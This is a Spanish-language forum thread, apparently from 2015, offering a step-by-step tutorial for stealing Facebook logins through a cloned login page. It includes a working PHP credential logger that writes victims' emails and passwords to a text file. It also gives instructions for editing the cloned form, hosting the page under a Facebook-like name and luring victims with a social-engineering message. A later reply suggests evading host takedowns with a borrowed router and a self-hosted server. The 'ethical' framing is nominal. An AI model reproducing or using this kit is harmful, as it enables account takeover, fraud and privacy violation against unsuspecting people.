• como hackear facebook mediante phishing ético

  • Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
 #479028  por lobo solitario
 08 Oct 2015, 03:47
advertencia: No me hago responsable del mal uso que se le pueda dar al contenido aquí expuesta




¿que es el phishing?

Suplantación de identidad.

El termino Phishing es utilizado para referirse a uno de los métodos mas utilizados por delincuentes cibernéticos para estafar y obtener información confidencial de forma fraudulenta como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria de la victima.

El estafador, conocido como phisher, se vale de técnicas de ingeniería social, haciéndose pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo general un correo electrónico, o algún sistema de mensajería instantánea, redes sociales SMS/MMS, a raíz de un malware o incluso utilizando también llamadas telefónicas. [ Debe registrarse para ver este enlace ] toda la información de que es el phishing y como protegerse



¿como hackear facebook mediante phishing?



PASO 1: Crear archivo Phishing.php (block de notas )

1. Incluso si usted no tiene ningún conocimiento de archivo PHP simplemente copia el siguiente script y lo guardara como phishing.php


:<?php
header("Location: https://www.facebook.com/login.php"&#41;;
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



PASO 2 : Creación de página index.html :

1. Abra la página de inicio de sesión de Facebook a continuación , haga clic derecho > Ver código fuente de página y pegarlo en el bloc de notas y guardarlo como
index.html



2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para: acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con phishing.php



[[



3. Búsqueda ( pulsa Ctrl + F ) para: método en ella y reemplace la parte resaltada (post ) con get




[ Debe registrarse para ver este enlace ]



4. pon guardar como index.html y hace click donde dice codificación UTF-8

OJO SI LO GUARDAS SIN LA CODIFICACIÓN UTF-8 QUEDARA LA PAGINA CON FALTA DE AUTOGRAFIA Y CON SIGNOS DE PREGUNTA EN TODAS PARTES SI QUE POR ESO GUARDARLO CON CODIFICACIÓN UTF-8






[ Debe registrarse para ver este enlace ]






PASO 3 : Ahora crea un archivo de texto completamente en blanco con el nombre passwords.txt


Ahora usted tiene todas las siguientes tres archivos con usted:
1. phishing.php
2. index.html
3. passwords.txt






Paso 4 : Ahora tiene que hacer un sitio web



Le recomendé que [ Debe registrarse para ver este enlace ] porque es completamente gratuito de alojamiento con dominio gratis .

Ir a : [ Debe registrarse para ver este enlace ] y haga click en donde dice Regístrate y completa lo siguiente como la captura de pantalla


[ Debe registrarse para ver este enlace ]





2. Ahora vea su cuenta de correo electrónico que usted dio y confirme su cuenta con el enlace de confirmación .





3. subir los archivos (index.html) (passwords.txt) (phishing.php) ya que esten adentro de su cuenta miarroba van donde dice hosting si no lo encuentran entren en [ Debe registrarse para ver este enlace ] luego van donde dice nuevo espacio dan click saldrá algo así

[ Debe registrarse para ver este enlace ]



llenan los datos les recomiendo que en Dirección de la página web: pongan algo relacionado con facebook como facebooksoporte o como quieran solo es para hacerlo un poco mas creible





ahora si a subir los archivos (index.html) (passwords.txt) (phishing.php)



van donde dice 1 espacio alado de nuevo espacio dan click y saldrá el nombre que pusieron en Título de la página web bueno le dan en administrar y saldrá algo muy parecido a esto van donde dice webFTP



[ Debe registrarse para ver este enlace ]






ay dos carpetas hacen click donde dice web abren la carpeta estará sin archivos


[ Debe registrarse para ver este enlace ]



buno hacen click donde dice subir y marcan el archivo (index.html) ya que se aya subido el index suben el archivo (passwords.txt) y luego el archivo (phishing.php) bueno quedaría algo así





[ Debe registrarse para ver este enlace ]





AHORA DAN CLICK DONDE DICE INDEX.HTML Y LOS LLEVARA A UNA PAGINA IGUAL A FACEBOOK QUE PARECE LEGITIMA Y LISTO ENVÍAN EL LINK DICIENDO NOSE UN EJEMPLO ME PUEDES AYUDAR CON MI PAGINA DALE ME GUSTA POR FAVOR (ingeniería social)

la pagina falsa


[ Debe registrarse para ver este enlace ]




AHORA CUANDO LA VICTIMA YA PUSO SU DATOS COMO CORREO ELECTRONICO CONTRASEÑA YA QUE PUSO INICIAR RECIÉN SE VA ALA PAGINA ORINAL DE FACEBOOK


[ Debe registrarse para ver este enlace ]


[ Debe registrarse para ver este enlace ]



¿ahora como reviso el correo y la clave que ingreso la victima?




muy fácil ay dos opciones de revisarlas


1. poniendo despues de el url passwords.txt como esta captura



[ Debe registrarse para ver este enlace ]





2. abren miarroba van donde dice a su hosting creado van donde dice webFTP abren la carpeta web marcan la casilla donde dice passwords.txt hacen click donde dice accion y hacen click donde dice editar

[ Debe registrarse para ver este enlace ]


[ Debe registrarse para ver este enlace ]



toda duda del contenido enviarme un mensaje a [ Debe registrarse para ver este enlace ]
 #479784  por KuBrY
 21 Oct 2015, 21:29
No entiendo lo que explicas que busquemos en el paso 2º en el bloc de notas, me dice que busquemos: 2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para: acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con phishing.php
 #479951  por Bibeto
 26 Oct 2015, 04:41
KuBrY escribió:tengo un problema con el paso 2º, creo que escribiste mal y no se que buscar en el bloc de notas
Lo que tienes que buscar es la palabra 'action' en el bloc de notas donde copiaste la página de inicio de facebook y remplazar lo que está entre las comillas

action="esto es lo que tienes que remplazar"
action="Phishing.php"

PD: Pensé que era tutorial del amigo @Solitario xD jajajajaja ya se me hacía raro que publicara algo así

 #480040  por KHC
 28 Oct 2015, 08:10
Lo mas viejo del mundo.
Muchos frameworks ya ofrecen todo lo que explica @lobo solitario con unos cuantos next next next.
Saludos!
 #480193  por n0z
 01 Nov 2015, 01:21
Adwind, me interesa el metodo que indicas, quieres elaborar en como va, me imagino que es mediante el .php correcto?
 #486735  por Pepe8
 07 Jun 2016, 21:54
Escral escribió:Not working , el host lo detecta como phishing y lo borra , algún host para subir el scam?
Wifi prestada con acceso a la configuración del router para poder redirigir tráfico y abrir puertos a tu ip, y montar un servidor propio con apache por ejemplo, redirigirlo con un dns dinámico, y montarlo en una raspberry pi por el tema del bajó consumo 24x7.